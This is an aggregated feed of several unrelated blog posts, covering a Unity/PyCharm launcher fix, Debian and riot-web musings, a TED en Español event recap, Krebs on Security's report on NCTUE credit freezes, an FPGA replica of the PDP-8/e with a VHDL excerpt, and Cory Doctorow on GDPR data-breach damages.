Finding the sources and looking a little at the repository did not make it clear which was the entry point. I was expecting at least the README or the INSTALL file would give some relevant hints on the config or the initalization. M patience was running dry.

Maybe looking on my own system would be a better approach?
eddy@feodora:~$ which unity
/usr/bin/unity
eddy@feodora:~$ ll $(which unity)
-rwxr-xr-x 1 root root 9907 feb 21 21:38 /usr/bin/unity*
eddy@feodora:~$ ^ll^file
file $(which unity)
/usr/bin/unity: Python script, ASCII text executable
BINGO! This looks like a python script executable, it's not a binary, in spite of the many .cpp sources in the Unity tree.

I opened the file with less, then found this interesting bit:
 def reset_launcher_icons ():
    '''Reset the default launcher icon and restart it.'''
    subprocess.Popen(["gsettings", "reset" ,"com.canonical.Unity.Launcher" , "favorites"])
Great! So it stores that stuff in the pseudo-registry, but have to look under com.canonical.Unity.Launcher.favorites. Firing dconf-editor again found the relevant bit in the value of that key:
'application://jetbrains-pycharm-ce.desktop'
So where is this .desktop file? I guess using find is going to bring it up:
find /home/eddy/.local/ -name jetbrains* -exec vi {} \;
It did, and the content made it obvious what was happening:
[Desktop Entry]
Version=1.0
Type=Application
Name=PyCharm Community Edition
Icon=/home/eddy/opt/pycharm-community-2016.3.1/bin/pycharm.png
Exec="/home/eddy/opt/pycharm-community-2016.3.1/bin/pycharm.sh" %f

Comment=The Drive to Develop
Categories=Development;IDE;
Terminal=false
StartupWMClass=jetbrains-pycharm-ce
Probably Unity did not create a new desktop file when locking the icon, it would simply check if the jetbrains-pycharm-ce.desktop file existed already in my.local directory, saw it was, so it skipped its recreation.

Just as somebody said, all difficult computer science problems are eiether caused by leaky abstractions or caching. I guess here we're having some sort of caching issue, but is easy to fix, just edit the file:
eddy@feodora:~$ cat /home/eddy/.local/share/applications/jetbrains-pycharm-ce.desktop

[Desktop Entry]
Version=1.0
Type=Application
Name=PyCharm Community Edition
Icon=/home/eddy/opt/pycharm-community-2018.1.2/bin/pycharm.png
Exec="/home/eddy/opt/pycharm-community-2018.1.2/bin/pycharm.sh" %f
Comment=The Drive to Develop
Categories=Development;IDE;
Terminal=false
StartupWMClass=jetbrains-pycharm-ce
Checked again the start, and now the expected slash screen appears. GREAT!

I wonder if this is a Unity issue or is it due to some broken library that could affect other desktop environments such as MATE, GNOME or XFCE?

"Only" lost 2 hours (including this post) with this stupid bug, so I can go back to what I was trying in the first place, but now is already to late, so I have to go to sleep.

Planet DebianShirish Agarwal: A random collection of thoughts

First of all couple of weeks back, I was able to put out an article about riot-web. It’s been on my mind for almost a month or more hence finally sat down, wrote and re-wrote it a few times to make it simpler for newbies to also know.

One thing I did miss out to share was the Debian matrix page . The other thing which was needling me was the comment . This is not the first time I have heard that complaint about riot-web before and at times had it happen before.

The thing is its always an issue for me when to write about something, how to say something is mature or not as software in general has a tendency to fail at any given point of time.

For such queries I haven’t the foggiest idea as to what to share as the only debug mode is if you have built riot from source and run the -debug tests but can’t say that to a newbie.

One of the things which I didn’t mention is if any researchers tried to get data out of riot-web because AFAIK twitter banned lot of researchers who were trying to get data out of their platform to do analytics etc.

This I sort of remembered as I read an open letter couple of days before by researchers about independent oversight over facebook as a concern as well.

It would have been interesting if there were any new interesting studies made from riot-web implementation, something similar to how a study of IRC I read some years ago. The mathematical observations were above my head but still some of the observations were interesting to say the least.

There has been another pattern I have been seeing in the newer decentralized free software services. While in theory, the reference implementation is supposed to be one of many, many a times, it can become the defacto implementation or otherwise you have the irc way where each client just willy-nilly did features but still somehow managed to stay sane and interoperate over the years but that’s a different story altogether for a different day.

While I like the latter, it is and can be hard as migration ia a huge headache from one client to the other irrespective of whatever the content is. There is and could be data-loss or even meta-data loss and you may come to know only years later (if you are ‘lucky’ what info. it is that you lost.)

The easiest example is contacts migration. Most professionals have at least a hundred or two contacts, now if few go missing during migration from either one version to the other or from one platform to the other, they either don’t have the time or the skills to figure out why part-migration succeeded and the rest didn’t. Of course there is a whole industry of migration experts who can write code which would have all the hooks to see that the migration works smoothly or point out what was not migrated.

These services are wholly commercial in nature and also one cannot know in advance how good/bad the service is as usually issues come to bite much later.

On another note altogether, had been seeing the sort of java confusion from a distance. There’s a Mars Sims project I have been following for quite sometime, made a few bug-reports and for reasons unknown, was eventually made a contributor. They are also in a flux as to what to do. I had read the lists.debian.org/debian-java off-and-on the web and was glad to point out the correct links.

I had read the rumors sometime back that Oracle was bull-charging Java so that it would be the only provider in town and almost everybody would have to come to it for support rather than any other provider. I can’t prove it one way or the other as it’s just a rumor but does seem to have sense.

At the end, I remember a comment made by a DD Praveen at a minidebconf which happened a month ago. It was about how Upstreams are somewhat discouraging to Debian practices and specifically more about Debian Policy . This has been discussed somewhat threadbare in the thread What can Debian do to provide complex applications to its users? in Debian-devel. The short history I know is about minified javascript does and can have security issues, see this comment in the same thread as well as see the related point shared in Debian Policy. Even Praveen’s reply is pretty illuminating in the thread.

As a user I recommend Debian to my friends, clients because of the stability as well as security tracker but with upstreams in a sort of non-cooperative mood it just adds that much more responsibility to DD’s than before.

The non-cooperation can also be seen in something like PR, for instance like the one which was done by andrewshadura and that is somewhat sad 😦

TEDTED en Español: TED’s first-ever Spanish-language speaker event in NYC

Host Gerry Garbulsky opens the TED en Español event in the TEDNYC theater, New York, NY. (Photo: Dian Lofton / TED)

Thursday marked the first-ever TED en Español speaker event hosted by TED in its New York City office. The all-Spanish daytime event featured eight speakers, a musical performance, five short films and fifteen one-minute talks given by members of the audience.

The New York event is just the latest addition to TED’s sweeping new Spanish-language TED en Español initiative, designed to spread ideas to the global Hispanic community. Led by TED’s Gerry Garbulsky, also head of the world’s largest TEDx event, TEDxRiodelaPlata in Argentina, TED en Español includes a Facebook community, Twitter feed, weekly “Boletín” newsletter, YouTube channel and — as of earlier this month — an original podcast created in partnership with Univision Communications.

Should we automate democracy? “Is it just me, or are there other people here that are a little bit disappointed with democracy?” asks César A. Hidalgo. Like other concerned citizens, the MIT physics professor wants to make sure we have elected governments that truly represent our values and wishes. His solution: What if scientists could create an AI that votes for you? Hidalgo envisions a system in which each voter could teach her own AI how to think like her, using quizzes, reading lists and other types of data. So once you’ve trained your AI and validated a few of the decisions it makes for you, you could leave it on autopilot, voting and advocating for you … or you could choose to approve every decision it suggests. It’s easy to poke holes in his idea, but Hidalgo believes it’s worth trying out on a small scale. His bottom line: “Democracy has a very bad user interface. If you can improve the user interface, you might be able to use it more.”

When the focus of failure shifts from what is lost to what is gained, we can all learn to “fail mindfully,” says Leticia Gasca. (Photo: Jasmina Tomic / TED)

How to fail mindfully. If your business failed in Ancient Greece, you’d have to stand in the town square with a basket over your head. Thankfully, we’ve come a long way — or have we? Failed-business owner Leticia Gasca doesn’t think so. Motivated by her own painful experience, she set out to create a way for others like her to convert the guilt and shame of a business venture gone bad into a catalyst for growth. Thus was born “Fuckup Nights” (FUN), a global movement and event series for sharing stories of professional failure, and The Failure Institute, a global research group that studies failure and its impact on people, businesses and communities. For Gasca, when the focus of failure shifts from what is lost to what is gained, we can all learn to “fail mindfully” and see endings as doorways to empathy, resilience and renewal.

From four countries to one stage. The pan-Latin-American musical ensemble LADAMA brought much more than just music to the TED en Español stage. Inviting the audience to dance with them, Venezuelan Maria Fernanda Gonzalez, Brazilian Lara Klaus, Colombian Daniela Serna and American Sara Lucas sing and dance to a medley of rhythms that range from South American to Caribbean-infused styles. Playing “Night Traveler” and “Porro Maracatu,” LADAMA transformed the stage into a place of music worth spreading.

Gastón Acurio shares stories of the power of food to change lives. (Photo: Jasmina Tomic / TED)

World change starts in your kitchen. In his pioneering work to bring Peruvian cuisine to the world, Gastón Acurio discovered the power that food has to change peoples’ lives. As ceviche started appearing in renowned restaurants worldwide, Gastón saw his home country of Peru begin to appreciate the diversity of its gastronomy and become proud of its own culture. But food hasn’t always been used to bring good to the world. With the industrial revolution and the rise of consumerism, “more people in the world are dying from obesity than hunger,” he notes, and many peoples’ lifestyles aren’t sustainable. 
By interacting with and caring about the food we eat, Gastón says, we can change our priorities as individuals and change the industries that serve us. He doesn’t yet have all the answers on how to make this a systematic movement that politicians can get behind, but world-renowned cooks are already taking these ideas into their kitchens. He tells the stories of a restaurant in Peru that supports native people by sourcing ingredients from them, a famous chef in NYC who’s fighting against the use of monocultures and an emblematic restaurant in France that has barred meat from the menu. “Cooks worldwide are convinced that we cannot wait for others to make changes and that we must jump into action,” he says. But professional cooks can’t do it all. If we want real change to happen, Gastón urges, we need home cooking to be at the center of everything.

The interconnectedness of music and life. Chilean musical director Paolo Bortolameolli wraps his views on music within his memory of crying the very first time he listened to live classical music. Sharing the emotions music evoked in him, Bortolameolli presents music as a metaphor for life — full of the expected and the unexpected. He thinks that we listen to the same songs again and again because, as humans, we like to experience life from a standpoint of expectation and stability, and he simultaneously suggests that every time we listen to a musical piece, we enliven the music, imbuing it with the potential to be not just recognized but rediscovered.

We reap what we sow — let’s sow something different. Up until the mid-’80s, the average incomes in major Latin American countries were on par with those in Korea. But now, less than a generation later, Koreans earn two to three times more than their Latin American counterparts. How can that be? The difference, says futurist Juan Enriquez, lies in a national prioritization of brainpower — and in identifying, educating and celebrating the best minds. What if in Latin America we started selecting for academic excellence the way we would for an Olympic soccer team? If Latin American countries are to thrive in the era of technology and beyond, they should look to establish their own top universities rather than letting their brightest minds thirst for nourishment, competition and achievement — and find it elsewhere, in foreign lands.

Rebeca Hwang shares her dream of a world where identities are used to bring people together, not alienate them. (Photo: Jasmina Tomic / TED)

Diversity is a superpower. Rebeca Hwang was born in Korea, raised in Argentina and educated in the United States. As someone who has spent a lifetime juggling various identities, Hwang can attest that having a blended background, while sometimes challenging, is actually a superpower. The venture capitalist shared how her fluency in many languages and cultures allows her to make connections with all kinds of people from around the globe. As the mother of two young children, Hwang hopes to pass this perspective on to her kids. She wants to teach them to embrace their unique backgrounds and to create a world where identities are used to bring people together, not alienate them.

Marine ecologist Enric Sala wants to protect the last wild places in the ocean. (Photo: Jasmina Tomic / TED)

How we’ll save our oceans If you jumped in the ocean at any random spot, says Enric Sala, you’d have a 98 percent chance of diving into a dead zone — a barren landscape empty of large fish and other forms of marine life. As a marine ecologist and National Geographic Explorer-in-Residence, Sala has dedicated his life to surveying the world’s oceans. He proposes a radical solution to help protect the oceans by focusing on our high seas, advocating for the creation of a reserve that would include two-thirds of the world’s ocean. By safeguarding our high seas, Sala believes we will restore the ecological, economic and social benefits of the ocean — and ensure that when our grandchildren jump into any random spot in the sea, they’ll encounter an abundance of glorious marine life instead of empty space.

And to wrap it up … In an improvised rap performance with plenty of well-timed dance moves, psychologist and dance therapist César Silveyra closes the session with 15 of what he calls “nano-talks.” In a spectacular showdown of his skills, Silveyra ties together ideas from previous speakers at the event, including Enric Sala’s warnings about overfished oceans, Gastón Acurio’s Peruvian cooking revolution and even a shoutout for speaker Rebeca Hwang’s grandmother … all the while “feeling like Beyoncé.”

Geek FeminismInformal Geek Feminism get-togethers, May and June

Some Geek Feminism folks will be at the following conferences and conventions in the United States over the next several weeks, in case contributors and readers would like to have some informal get-togethers to reminisce and chat about inheritors of the GF legacy:

If you’re interested, feel free to comment below, and to take on the step of initiating open space/programming/session organizing!

CryptogramVirginia Beach Police Want Encrypted Radios

This article says that the Virginia Beach police are looking to buy encrypted radios.

Virginia Beach police believe encryption will prevent criminals from listening to police communications. They said officer safety would increase and citizens would be better protected.

Someone should ask them if they want those radios to have a backdoor.

Krebs on SecurityThink You’ve Got Your Credit Freezes Covered? Think Again.

I spent a few days last week speaking at and attending a conference on responding to identity theft. The forum was held in Florida, one of the major epicenters for identity fraud complaints in United States. One gripe I heard from several presenters was that identity thieves increasingly are finding ways to open new mobile phone accounts in the names of people who have already frozen their credit files with the big-three credit bureaus. Here’s a look at what may be going on, and how you can protect yourself.

Carrie Kerskie is director of the Identity Fraud Institute at Hodges University in Naples. A big part of her job is helping local residents respond to identity theft and fraud complaints. Kerskie said she’s had multiple victims in her area recently complain of having cell phone accounts opened in their names even though they had already frozen their credit files at the big three credit bureausEquifax, Experian and Trans Union (as well as distant fourth bureau Innovis).

The freeze process is designed so that a creditor should not be able to see your credit file unless you unfreeze the account. A credit freeze blocks potential creditors from being able to view or “pull” your credit file, making it far more difficult for identity thieves to apply for new lines of credit in your name.

But Kerskie’s investigation revealed that the mobile phone merchants weren’t asking any of the four credit bureaus mentioned above. Rather, the mobile providers were making credit queries with the National Consumer Telecommunications and Utilities Exchange (NCTUE), or nctue.com.

Source: nctue.com

“We’re finding that a lot of phone carriers — even some of the larger ones — are relying on NCTUE for credit checks,” Kerskie said. “It’s mainly phone carriers, but utilities, power, water, cable, any of those, they’re all starting to use this more.”

The NCTUE is a consumer reporting agency founded by AT&T in 1997 that maintains data such as payment and account history, reported by telecommunication, pay TV and utility service providers that are members of NCTUE.

Who are the NCTUE’s members? If you call the 800-number that NCTUE makes available to get a free copy of your NCTUE credit report, the option for “more information” about the organization says there are four “exchanges” that feed into the NCTUE’s system: the NCTUE itself; something called “Centralized Credit Check Systems“; the New York Data Exchange; and the California Utility Exchange.

According to a partner solutions page at Verizon, the New York Data Exchange is a not-for-profit entity created in 1996 that provides participating exchange carriers with access to local telecommunications service arrears (accounts that are unpaid) and final account information on residential end user accounts.

The NYDE is operated by Equifax Credit Information Services Inc. (yes, that Equifax). Verizon is one of many telecom providers that use the NYDE (and recall that AT&T was the founder of NCTUE).

The California Utility Exchange collects customer payment data from dozens of local utilities in the state, and also is operated by Equifax (Equifax Information Services LLC).

Google has virtually no useful information available about an entity called Centralized Credit Check Systems. It’s possible it no longer exists. If anyone finds differently, please leave a note in the comments section.

When I did some more digging on the NCTUE, I discovered…wait for it…Equifax also is the sole contractor that manages the NCTUE database. The entity’s site is also hosted out of Equifax’s servers. Equifax’s current contract to provide this service expires in 2020, according to a press release posted in 2015 by Equifax.

RED LIGHT. GREEN LIGHT. RED LIGHT.

Fortunately, the NCTUE makes it fairly easy to obtain any records they may have on Americans.  Simply phone them up (1-866-349-5185) and provide your Social Security number and the numeric portion of your registered street address.

Assuming the automated system can verify you with that information, the system then orders an NCTUE credit report to be sent to the address on file. You can also request to be sent a free “risk score” assigned by the NCTUE for each credit file it maintains.

The NCTUE also offers an online process for freezing one’s report. Perhaps unsurprisingly, however, the process for ordering a freeze through the NCTUE appears to be completely borked at the moment, thanks no doubt to Equifax’s well documented abysmal security practices.

Alternatively, it could all be part of a willful or negligent strategy to continue discouraging Americans from freezing their credit files (experts say the bureaus make about $1 for each time they sell your file to a potential creditor).

On April 29, I had an occasion to visit Equifax’s credit freeze application page, and found that the site was being served with an expired SSL certificate from Symantec (i.e., the site would not let me browse using https://). This happened because I went to the site using Google Chrome, and Google announced a decision in September 2017 to no longer trust SSL certs issued by Symantec prior to June 1, 2016.

Google said it would do this starting with Google Chrome version 66. It did not keep this plan a secret. On April 18, Google pushed out Chrome 66.  Despite all of the advance warnings, the security people at Equifax apparently missed the memo and in so doing probably scared most people away from its freeze page for several weeks (Equifax fixed the problem on its site sometime after I tweeted about the expired certificate on April 29).

That’s because when one uses Chrome to visit a site whose encryption certificate is validated by one of these unsupported Symantec certs, Chrome puts up a dire security warning that would almost certainly discourage most casual users from continuing.

The insecurity around Equifax’s own freeze site likely discouraged people from requesting a freeze on their credit files.

On May 7, when I visited the NCTUE’s page for freezing my credit file with them I was presented with the very same connection SSL security alert from Chrome, warning of an invalid Symantec certificate and that any data I shared with the NCTUE’s freeze page would not be encrypted in transit.

The security alert generated by Chrome when visiting the freeze page for the NCTUE, whose database (and apparently web site) also is run by Equifax.

When I clicked through past the warnings and proceeded to the insecure NCTUE freeze form (which is worded and stylized almost exactly like Equifax’s credit freeze page), I filled out the required information to freeze my NCTUE file. See if you can guess what happened next.

Yep, I was unceremoniously declined the opportunity to do that. “We are currently unable to service your request,” read the resulting Web page, without suggesting alternative means of obtaining its report. “Please try again later.”

The message I received after trying to freeze my file with the NCTUE.

This scenario will no doubt be familiar to many readers who tried (and failed in a similar fashion) to file freezes on their credit files with Equifax after the company divulged that hackers had relieved it of Social Security numbers, addresses, dates of birth and other sensitive data on nearly 150 million Americans last September. I attempted to file a freeze via the NCTUE’s site with no fewer than three different browsers, and each time the form reset itself upon submission or took me to a failure page.

So let’s review. Many people who have succeeded in freezing their credit files with Equifax have nonetheless had their identities stolen and new accounts opened in their names thanks to a lesser-known credit bureau that seems to rely entirely on credit checking entities operated by Equifax.

“This just reinforces the fact that we are no longer in control of our information,” said Kerskie, who is also a founding member of Griffon Force, a Florida-based identity theft restoration firm.

I find it difficult to disagree with Kerskie’s statement. What chaps me about this discovery is that countless Americans are in many cases plunking down $3-$10 per bureau to freeze their credit files, and yet a huge player in this market is able to continue to profit off of identity theft on those same Americans.

EQUIFAX RESPONDS

I asked Equifax why the very same credit bureau operating the NCTUE’s data exchange (and those of at least two other contributing members) couldn’t detect when consumers had placed credit freezes with Equifax. Put simply, Equifax’s wall of legal verbiage below says mainly that NCTUE is a separate entity from Equifax, and that NCTUE doesn’t include Equifax credit information.

Here is Equifax’s full statement on the matter:

·        The National Consumer Telecom and Utilities Exchange, Inc. (NCTUE) is a nationwide, member-owned and operated, FCRA-compliant consumer reporting agency that houses both positive and negative consumer payment data reported by its members, such as new connect requests, payment history, and historical account status and/or fraudulent accounts.  NCTUE members are providers of telecommunications and pay/satellite television services to consumers, as well as utilities providing gas, electrical and water services to consumers. 

·        This information is available to NCTUE members and, on a limited basis, to certain other customers of NCTUE’s contracted exchange operator, Equifax Information Services, LLC (Equifax) – typically financial institutions and insurance providers.  NCTUE does not include Equifax credit information, and Equifax is not a member of NCTUE, nor does Equifax own any aspect of NCTUE.  NCTUE does not provide telecommunications pay/ satellite television or utility services to consumers, and consumers do not apply for those services with NCTUE.

·        As a consumer reporting agency, NCTUE places and lifts security freezes on consumer files in accordance with the state law applicable to the consumer.  NCTUE also maintains a voluntary security freeze program for consumers who live in states which currently do not have a security freeze law. 

·        NCTUE is a separate consumer reporting agency from Equifax and therefore a consumer would need to independently place and lift a freeze with NCTUE.

·        While state laws vary in the manner in which consumers can place or lift a security freeze (temporarily or permanently), if a consumer has a security freeze on his or her NCTUE file and has not temporarily lifted the freeze, a creditor or other service provider, such as a mobile phone provider, generally cannot access that consumer’s NCTUE report in connection with a new account opening.  However, the creditor or provider may be able to access that consumer’s credit report from another consumer reporting agency in order to open a new account, or decide to open the account without accessing a credit report from any consumer reporting agency, such as NCTUE or Equifax. 

PLACING THE FREEZE

I was able to successfully place a freeze on my NCTUE report by calling their 800-number — 1-866-349-5355. The message said the NCTUE might charge a fee for placing or lifting the freeze, in accordance with state freeze laws.

Depending on your state of residence, the cost of placing a freeze on your credit file at Equifax, Experian or Trans Union can run between $3 and $10 per credit bureau, and in many states the bureaus also can charge fees for temporarily “thawing” and removing a freeze (according to a list published by Consumers Union, residents of four states — Indiana, Maine, North Carolina, South Carolina — do not need to pay to place, thaw or lift a freeze).

While my home state of Virginia allows the bureaus to charge $10 to place a freeze, for whatever reason the NCTUE did not assess that fee when I placed my freeze request with them. When and if your freeze request does get approved using the NCTUE’s automated phone system, make sure you have pen and paper or a keyboard handy to jot down the freeze PIN, which you will need in the event you ever wish to lift the freeze. When the system read my freeze PIN, it was read so quickly that I had to hit “*” on the dial pad several times to repeat the message.

It’s frankly absurd that consumers should ever have to pay to freeze their credit files at all, and yet a recent study indicates that almost 20 percent of Americans chose to do so at one or more of the three major credit bureaus since Equifax announced its breach last fall. The total estimated cost to consumers in freeze fees? $1.4 billion.

A bill in the U.S. Senate that looks likely to pass this year would require credit-reporting firms to let consumers place a freeze without paying. The free freeze component of the bill is just a tiny provision in a much larger banking reform bill — S. 2155 — that consumer groups say will roll back some of the consumer and market protections put in place after the Great Recession of the last decade.

“It’s part of a big banking bill that has provisions we hate,” said Chi Chi Wu, a staff attorney with the National Consumer Law Center. “It has some provisions not having to do with credit reporting, such as rolling back homeowners disclosure act provisions, changing protections in [current law] having to do with systemic risk.”

Sen. Jack Reed (D-RI) has offered a bill (S. 2362) that would invert the current credit reporting system by making all consumer credit files frozen by default, forcing consumers to unfreeze their files whenever they wish to obtain new credit. Meanwhile, several other bills would impose slightly less dramatic changes to the consumer credit reporting industry.

Wu said that while S. 2155 appears steaming toward passage, she doubts any of the other freeze-related bills will go anywhere.

“None of these bills that do something really strong are moving very far,” she said.

I should note that NCTUE does offer freeze alternatives. Just like with the big four, NCTUE lets consumers place a somewhat less restrictive “fraud alert” on their file indicating that verbal permission should be obtained over the phone from a consumer before a new account can be opened in their name.

Here is a primer on freezing your credit file with the big three bureaus, including Innovis. This tutorial also includes advice on placing a security alert at ChexSystems, which is used by thousands of banks to verify customers that are requesting new checking and savings accounts. In addition, consumers can opt out of pre-approved credit offers by calling 1-888-5-OPT-OUT (1-888-567-8688), or visit optoutprescreen.com.

Oh, and if you don’t want Equifax sharing your salary history over the life of your entire career, you might want to opt out of that program as well.

Equifax and its ilk may one day finally be exposed for the digital dinosaurs that they are. But until that day, if you care about your identity you now may have another freeze to worry about. And if you decide to take the step of freezing your file at the NCTUE, please sound off about your experience in the comments below.

Planet DebianAndreas Bombe: PDP-8/e Replicated — Clocks And Logic

This is, at long last, part 3 of the overview of my PDP-8/e replica project and offers some details of the low-level implementation.

I have mentioned that I build my PDP-8/e replica from the original schematics. The great thing about the PDP-8/e is that it is still built in discrete logic rather than around a microprocessor, meaning that schematics of the actual CPU logic are available instead of just programmer’s documentation. After all, with so many chips on multiple boards something is bound to break down sooner or later and technicians need schematics to diagnose and fix that1. In addition, there’s a maintenance manual that very helpfully describes the workings of every little part of the CPU with excerpts of the full schematics, but it has some inaccuracies and occasionally outright errors in the excerpts so the schematics are still indispensable.

Originally I wanted to design my own logic and use the schematics as just another reference. Since the front panel is a major part of the project and I want it to visually behave as close as possible to the real thing, I would have to duplicate the cycles exactly and generally work very close to the original design. I decided that at that point I might as well just reimplement the schematics.

However, some things can not be reimplemented exactly in the FPGA, other things are a bad fit and can be improved significantly with slight changes.

Clocks

Back in the day, the rule for digital circuits were multi-phase clocks of varying complexity, and the PDP-8/e is no exception in that regard. A cycle has four timing states of different lengths that each end on a timing pulse.

timing diagram from the

timing diagram from the "pdp8/e & pdp8/m small computer handbook 1972"

As can be seen, the timing states are active when they are at low voltage while the timing pulses are active high. There are plenty of quirks like this which I describe below in the Logic section.

In the PDP-8 the timing generator was implemented as a circular chain of shift registers with parallel outputs. At power on, these registers are reset to all 1 except for 0 in the first two bits. The shift operation is driven by a 20 MHz clock2 and the two zeros then circulate while logic combinations of the parallel outputs generate the timing signals (and also core memory timing, not shown in the diagram above).

What happens with these signals is that the timing states together with control signals decoded from instructions select data outputs and paths while the associated timing pulse combined with timing state and instruction signals trigger D type flip-flops to save these results and present it on their outputs until they are next triggered with different input data.

Relevant for D type flip-flops is the rising edge of their clock input. The length of the pulse does not matter as long as it is not shorter than a required minimum. For example the accumulator register needs to be loaded at TP3 during major state E for a few different instructions. Thus the AC LOAD signal is generated as TP3 and E and (TAD instruction or AND instruction or …) and that signal is used as the clock input for all twelve flip-flops that make up the accumulator register.

However, having flip-flops clocked off timing pulses that are combined with different amounts of logic create differences between sample times which in turn make it hard to push that kind of design to high cycle frequencies. Basically all modern digital circuits are synchronous. There, all flip-flops are clocked directly off the same global clock and get triggered at the same time. Since of course not all flip-flops should get new values at every cycle they have an additional enable input so that the rising clock edge will only register new data when enable is also true3.

Naturally, FPGAs are tailored to this design paradigm. They have (a limited number of) dedicated clock distribution networks set apart from the regular signal routing resources, to provide low skew clock signals across the device. Groups of logic elements get only a very limited set of clock inputs for all their flip-flops. While it is certainly possible to run the same scheme as the original in an FPGA, it would be an inefficient use of resources and very likely make automated timing analysis difficult by requiring lots of manual specification of clock relationships between registers.

So while I do use 20 MHz as the base clock in my timing generator and generate the same signals in my design, I also provide this 20 MHz as the common clock to all logic. Instead of registers triggering on the timing pulse rising edges they get the timing pulses as enables. One difference resulting from that is registers aren’t triggered by the rising edge of a pulse anymore but will trigger on every clock cycle where the pulse is active. The original pulses are two clock cycles long and extend into the following time state so the correct data they picked up on the first cycle would be overwritten by wrong data on the second. I simply shortened the timing pulses to one clock cycle to adapt to this.

timing signals from simulaton showing long and fast cycle

timing signals from simulaton showing long and fast cycle

To reiterate, this is all in the interest of matching the original timing exactly. Analysis by the synthesis tool shows that I could easily push the base clock well over twice the current speed, and that’s already with it assuming that everything has to settle within one clock cycle as I’ve not specified multicycle paths. Meaning I could shorten the timing states to a single cycle4 for an overall more than 10× acceleration on the lowest speed grade of the low-end FPGA I’m using.

Logic

To save on logic, many parts with open collector outputs were used in the PDP-8. Instead of driving high or low voltage to represent zeros and ones, an open collector only drives either low voltage or leaves the line alone. Many outputs can then be simply connected together as they can’t drive conflicting voltages. Return to high voltage in the absence of outputs driving low is accomplished by a resistor to positive supply somewhere on the signal line.

The effect is that the connection of outputs itself forms a logic combination in that the signal is high when none of the gates drive low and it’s low when any number of gates drive low. Combining that with active low signalling, where a low voltage represents active or 1, the result is a logical OR combination of all outputs (called wired OR since no logic gates are involved).

The designers of the PDP-8/e made extensive use of that. The majority of signals are active low, marked with L after their name in the schematics. Some signals don’t have multiple sources and can be active high where it’s more convenient, those are marked with H. And then there are many signals that carry no indication at all and some that miss the indication in the maintenance manual just to make a reimplementer’s life more interesting.

excerpt from the PDP-8/e CPU schematic, generation of the accumulator load (AC LOAD L) signal can be seen on the right

excerpt from the PDP-8/e CPU schematic, generation of the accumulator load (AC LOAD L) signal can be seen on the right

As an example in this schematic, let’s look at AC LOAD L which triggers loading the accumulator register from the major registers bus. It’s a wired OR of two NAND outputs, both in the chip labeled E15, and with pull-up resistor R12 to +5 V. One NAND combines BUS STROBE and C2, the other TP3 and an OR in chip E7 of a bunch of instruction related signals. For comparison, here’s how I implemented it in VHDL:

ac_load <= (bus_strobe and not c2) or
           (TP3 and E and ir_TAD) or
           (TP3 and E and ir_AND) or
           (TP3 and E and ir_DCA) or
           (TP3 and F and ir_OPR);

FPGAs don’t have internal open collector logic5 and any output of a logic gate must be the only one driving a particular line. As a result, all the wired OR must be implemented with explicit ORs. Without the need to have active low logic I consistently use active high everywhere, meaning that the logic in my implementation is mostly inverted compared to the real thing. The deviation of ANDing TP3 with every signal instead of just once with the result of the OR is again due to consistency, I use the “<timing> and <major state> and <instruction signal>” pattern a lot.

One difficulty with wired OR is that it is never quite obvious from a given section of the schematics what all inputs to a given gate are. You may have a signal X being generated on one page of the schematic and a line with signal X as an input to a gate on another page, but that doesn’t mean there isn’t something on yet another page also driving it, or that it isn’t also present on a peripheral port6.

Some of the original logic is needed only for electrical reasons, such as buffers which are logic gates that do not combine multiple inputs but simply repeat their inputs (maybe inverted). Logic gate outputs can only drive so many inputs, so if one signal is widely used it needs buffers. Inverters are commonly used for that in the PDP-8. BUS STROBE above is one example, it is the inverted BUS STROBE L found on the backplane. Another is BTP3 (B for buffered) which is TP3 twice inverted.

Finally, some additional complexity is owed to the fact that the 8/e is made of discrete logic chips and that these have multiple gates in a package, for example the 7401 with four 2-input NAND gates with open collector outputs per chip. In designing the 8/e, logic was sometimes not implemented straightforwardly but as more complicated equivalents if it means unused gates in existing chips could be used rather than adding more chips.

Summary

I have started out saying that I build an exact PDP-8/e replica from the schematics. As I have detailed, that doesn’t involve just taking every gate and its connections from the schematic and writing it down in VHDL. I am changing the things that can not be directly implemented in an FPGA (like wired OR) and leaving out things that are not needed in this environment (such as buffers). Nevertheless, the underlying logic stays the same and as a result my implementation has the exact same timing and behaviour even in corner cases.

Ultimately all this only applies to the CPU and closely associated units (arithmetic and address extension). Moving out to peripheral hardware, the interface to the CPU may be the only part that could be implemented from original schematics. After all, where the magnetic tape drive interface in the original was controlling the actual tape hardware the equivalent in the replica project would be accessing emulated tape storage.

This finally concludes the overview of my project. Its development hasn’t advanced as much as I expected around this time last year since I ended up putting the project aside for a long while. After returning to it, running the MAINDEC test programs revealed a bunch of stuff I forgot to implement or implemented wrong which I had to fix. The optional Extended Arithmetic Element isn’t implemented yet, the Memory Extension & Time Share is now complete pending test failures I need to debug. It is now reaching a state where I consider the design getting ready to be published.


  1. There are also test programs that exercise and check every single logic gate to help pinpoint a problem. Naturally they are also extremely helpful with verifying that a replica is in fact working exactly like the real thing. [return]
  2. Thus 50 ns, one cycle of the 20 MHz clock, is the granularity at which these signals are created. The timing pulses, for example, are 100 ns long. [return]
  3. This is simply implemented by presenting them their own output by a feedback path when enable is false so that they reload their existing value on the clock edge. [return]
  4. In fact I would be limited by the speed of the external SRAM I use and its 6 bit wide data connection, requiring two cycles for a 12 bit access. [return]
  5. The IO pins that interface to the outside world generally have the capability to switch disconnection at run time, allowing open collector and similar signaling. [return]
  6. Besides the memory and expansion bus, the 8/e CPU also has a special interface to attach the Extended Arithmetic Element. [return]

Cory DoctorowTalking privacy and GDPR with Thomson Reuters

Thomson Reuters interviewed me for their new series on data privacy and the EU General Data Protection Regulation; here’s the audio!


What if you just said when you breach, the damages that you owe to the people whose data you breached cannot be limited to the immediate cognizable consequences of that one breach but instead has to take recognition of the fact that breaches are cumulative? That the data that you release might be merged with some other set that was previously released either deliberately by someone who thought that they’d anonymized it because key identifiers had been removed that you’ve now added back in or accidentally through another breach? The merger of those two might create a harm.

Now you can re-identify a huge number of those prescriptions. That might create all kinds of harms that are not immediately apparent just by releasing a database of people’s rides, but when merged with maybe that NIH or NHS database suddenly becomes incredibly toxic and compromising.

If for example we said, “Okay, in recognition of this fact that once that data is released it never goes away, and each time it’s released it gets merged with other databases to create fresh harms that are unquantifiable in this moment and should be assumed to exceed any kind of immediate thing that we can put our finger on, that you have to pay fairly large statutory damages if you’re found to have mishandled data.” Well, now I think the insurance companies are going to do a lot of our dirty work for us.

